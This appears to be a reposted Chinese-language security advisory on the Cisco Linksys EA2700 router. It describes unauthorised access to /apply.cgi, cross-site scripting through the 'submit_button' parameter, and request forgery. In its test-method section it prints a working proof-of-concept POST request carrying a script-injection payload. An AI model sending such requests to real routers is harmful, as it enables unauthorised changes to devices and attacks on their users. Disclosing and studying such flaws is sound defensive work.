Cisco Linksys EA2700 Router多个安全漏洞

发布日期:2013-04-15
更新日期:2013-04-16

受影响系统:
Cisco Linksys EA2700
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59054
 
Cisco Linksys EA2700是智能Wi-Fi路由器。
 
Cisco Linksys EA2700(固件版本1.0.12.128947)存在多个安全漏洞,可被恶意用户利用执行跨站脚本和请求伪造攻击,还可绕过某些安全限制。这些漏洞源于没有正确限制对/apply.cgi脚本的访问,造成未授权访问设备设置;/apply.cgi内的"submit_button" POST参数值也没有正确过滤,造成在受影响站点用户浏览器中执行任意HTML和脚本代码;应用没有对HTTP请求的有效性进行检查,造成攻击者控制设备设置。
 
<*来源:Phil Purviance
 
  链接:
        https://superevr.com/blog/2013/dont-use-linksys-routers/
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /apply.cgi HTTP/1.1
 Host: 192.168.1.1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 47
 
submit_button=xss&#39;%3balert(1)//934&amp;amp;action=Apply

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Cisco
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ppfdy.html